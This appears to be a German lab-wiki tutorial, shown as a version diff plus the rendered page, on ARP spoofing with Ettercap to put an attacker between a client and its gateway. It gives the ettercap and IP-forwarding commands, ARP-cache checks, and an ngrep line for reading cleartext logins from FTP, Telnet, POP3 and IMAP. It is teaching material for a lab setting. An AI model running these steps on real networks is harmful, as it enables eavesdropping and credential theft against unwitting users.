Arpspoofing mit Ettercap Gateway vorgauckeln Grundsätzlich: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=benötigtes Paket= *apt-get install ettercap-graphical *CLIENT=10.0.10.104 *GATEWAY=10.0.10.1 *INTERFACE=eth0 =Befehl= *ettercap -i $INTERFACE -Tq -M ARP /$C…“) |
|||
| Zeile 1: | Zeile 1: | ||
| − | = | + | =Ettercap: MITM zwischen Client und Gateway= |
| − | + | ||
| + | =Szenario= | ||
*CLIENT=10.0.10.104 | *CLIENT=10.0.10.104 | ||
*GATEWAY=10.0.10.1 | *GATEWAY=10.0.10.1 | ||
*INTERFACE=eth0 | *INTERFACE=eth0 | ||
| + | |||
| + | Der Angreifer schaltet sich per ARP-Spoofing zwischen den CLIENT und das GATEWAY. | ||
| + | Damit laeuft der gesamte Verkehr, den der CLIENT ins Internet oder in andere Netze | ||
| + | schickt, ueber den Angreifer. Das ist der klassische Fall zum Abhoeren des | ||
| + | Internet-Verkehrs eines einzelnen Opfers. | ||
| + | |||
| + | =Benoetigtes Paket= | ||
| + | *apt-get install ettercap-graphical | ||
| + | |||
| + | ;Das Paket ettercap-graphical enthaelt sowohl die grafische Oberflaeche als auch | ||
| + | ;den hier verwendeten Textmodus (-T). Ein separates Paket fuer die Konsole ist | ||
| + | ;nicht noetig. | ||
| + | |||
| + | =IP-Forwarding pruefen= | ||
| + | ;Damit das Opfer weiter ins Internet kommt und den Angriff nicht bemerkt, muss der | ||
| + | ;Angreifer die Pakete weiterleiten. Ettercap aktiviert das IP-Forwarding beim Start | ||
| + | ;in der Regel selbst; zur Kontrolle: | ||
| + | *cat /proc/sys/net/ipv4/ip_forward | ||
| + | |||
| + | ;Steht dort 0, von Hand einschalten: | ||
| + | *sysctl -w net.ipv4.ip_forward=1 | ||
=Befehl= | =Befehl= | ||
| − | *ettercap -i $INTERFACE -Tq -M | + | *ettercap -i $INTERFACE -Tq -M arp /$CLIENT// /$GATEWAY// |
| − | + | ||
| − | + | =Optionen= | |
| − | -i eth0 | + | -i eth0 = Interface |
| − | -T | + | -T = Textmodus |
| − | -q | + | -q = still (keine Paketinhalte fortlaufend ausgeben) |
| − | -M arp | + | -M arp = ARP-Spoofing als MITM-Methode |
| + | |||
| + | =Zieldefinition= | ||
| + | ;TARGET1 /$CLIENT// und TARGET2 /$GATEWAY// | ||
| + | :Die Zielangabe hat die Form /MAC/IP/PORT/ - leere Felder bedeuten "alles". | ||
| + | :/10.0.10.104// heisst also: beliebige MAC, IP 10.0.10.104, alle Ports. | ||
| + | :Ettercap vergiftet beide Richtungen: der CLIENT glaubt, der Angreifer sei das | ||
| + | :GATEWAY, und das GATEWAY glaubt, der Angreifer sei der CLIENT. | ||
| + | |||
| + | =Nachweis auf dem CLIENT= | ||
| + | ;Im ARP-Cache steht fuer das GATEWAY die MAC-Adresse des Angreifers | ||
| + | *arp -n | grep 10.0.10.1 | ||
| + | 10.0.10.1 ether <MAC-der-kali-innen> C eth0 | ||
| + | |||
| + | ;Der CLIENT schickt seine Pakete jetzt an den Angreifer, statt ans echte Gateway. | ||
| + | |||
| + | =Nachweis auf dem GATEWAY= | ||
| + | ;Im ARP-Cache steht fuer den CLIENT dieselbe MAC-Adresse | ||
| + | *arp -n | grep 10.0.10.104 | ||
| + | 10.0.10.104 ether <MAC-der-kali-innen> C eth0 | ||
| + | |||
| + | ;Beide Seiten tragen fuer unterschiedliche IPs dieselbe MAC ein - das ist der Beleg | ||
| + | ;fuer den laufenden MITM. | ||
| + | |||
| + | =Was jetzt sichtbar wird= | ||
| + | ;Der gesamte Verkehr des CLIENT laeuft ueber den Angreifer. Auf einem zweiten | ||
| + | ;Terminal laesst sich der Klartext-Anteil mitlesen, z.B. mit ngrep: | ||
| + | *ngrep -d $INTERFACE -q -W byline "" host 10.0.10.104 and tcp | ||
| + | |||
| + | ;Interessant sind die Klartext-Dienste: | ||
| + | 21 FTP Login + Passwort im Klartext | ||
| + | 23 Telnet komplette Sitzung im Klartext | ||
| + | 80 HTTP unverschluesselter Web-Verkehr | ||
| + | 110 POP3 Login + Passwort im Klartext | ||
| + | 143 IMAP Login + Passwort im Klartext | ||
| + | |||
| + | ;HTTPS, SSH und andere verschluesselte Dienste laufen zwar ebenfalls ueber den | ||
| + | ;Angreifer, sind aber nicht im Klartext lesbar. Genau das ist die Lehre: MITM | ||
| + | ;funktioniert weiterhin, aber Verschluesselung entwertet den Mitschnitt. | ||
| + | |||
| + | =Angriff beenden= | ||
| + | ;Ettercap mit q beenden. Beim sauberen Beenden schickt ettercap korrekte | ||
| + | ;ARP-Antworten (re-ARP), damit die ARP-Caches von CLIENT und GATEWAY wieder | ||
| + | ;auf die echten MAC-Adressen zeigen und das Opfer normal weiterarbeiten kann. | ||
| + | |||
| + | =Weiterfuehrende Angriffe= | ||
| + | *[[Ngrep]] | ||
Version vom 20. August 2026, 14:18 Uhr
Ettercap: MITM zwischen Client und Gateway
Szenario
- CLIENT=10.0.10.104
- GATEWAY=10.0.10.1
- INTERFACE=eth0
Der Angreifer schaltet sich per ARP-Spoofing zwischen den CLIENT und das GATEWAY. Damit laeuft der gesamte Verkehr, den der CLIENT ins Internet oder in andere Netze schickt, ueber den Angreifer. Das ist der klassische Fall zum Abhoeren des Internet-Verkehrs eines einzelnen Opfers.
Benoetigtes Paket
- apt-get install ettercap-graphical
- Das Paket ettercap-graphical enthaelt sowohl die grafische Oberflaeche als auch
- den hier verwendeten Textmodus (-T). Ein separates Paket fuer die Konsole ist
- nicht noetig.
IP-Forwarding pruefen
- Damit das Opfer weiter ins Internet kommt und den Angriff nicht bemerkt, muss der
- Angreifer die Pakete weiterleiten. Ettercap aktiviert das IP-Forwarding beim Start
- in der Regel selbst; zur Kontrolle
- cat /proc/sys/net/ipv4/ip_forward
- Steht dort 0, von Hand einschalten
- sysctl -w net.ipv4.ip_forward=1
Befehl
- ettercap -i $INTERFACE -Tq -M arp /$CLIENT// /$GATEWAY//
Optionen
-i eth0 = Interface -T = Textmodus -q = still (keine Paketinhalte fortlaufend ausgeben) -M arp = ARP-Spoofing als MITM-Methode
Zieldefinition
- TARGET1 /$CLIENT// und TARGET2 /$GATEWAY//
- Die Zielangabe hat die Form /MAC/IP/PORT/ - leere Felder bedeuten "alles".
- /10.0.10.104// heisst also: beliebige MAC, IP 10.0.10.104, alle Ports.
- Ettercap vergiftet beide Richtungen: der CLIENT glaubt, der Angreifer sei das
- GATEWAY, und das GATEWAY glaubt, der Angreifer sei der CLIENT.
Nachweis auf dem CLIENT
- Im ARP-Cache steht fuer das GATEWAY die MAC-Adresse des Angreifers
- arp -n | grep 10.0.10.1
10.0.10.1 ether <MAC-der-kali-innen> C eth0
- Der CLIENT schickt seine Pakete jetzt an den Angreifer, statt ans echte Gateway.
Nachweis auf dem GATEWAY
- Im ARP-Cache steht fuer den CLIENT dieselbe MAC-Adresse
- arp -n | grep 10.0.10.104
10.0.10.104 ether <MAC-der-kali-innen> C eth0
- Beide Seiten tragen fuer unterschiedliche IPs dieselbe MAC ein - das ist der Beleg
- fuer den laufenden MITM.
Was jetzt sichtbar wird
- Der gesamte Verkehr des CLIENT laeuft ueber den Angreifer. Auf einem zweiten
- Terminal laesst sich der Klartext-Anteil mitlesen, z.B. mit ngrep
- ngrep -d $INTERFACE -q -W byline "" host 10.0.10.104 and tcp
- Interessant sind die Klartext-Dienste
21 FTP Login + Passwort im Klartext 23 Telnet komplette Sitzung im Klartext 80 HTTP unverschluesselter Web-Verkehr 110 POP3 Login + Passwort im Klartext 143 IMAP Login + Passwort im Klartext
- HTTPS, SSH und andere verschluesselte Dienste laufen zwar ebenfalls ueber den
- Angreifer, sind aber nicht im Klartext lesbar. Genau das ist die Lehre
- MITM
- funktioniert weiterhin, aber Verschluesselung entwertet den Mitschnitt.
Angriff beenden
- Ettercap mit q beenden. Beim sauberen Beenden schickt ettercap korrekte
- ARP-Antworten (re-ARP), damit die ARP-Caches von CLIENT und GATEWAY wieder
- auf die echten MAC-Adressen zeigen und das Opfer normal weiterarbeiten kann.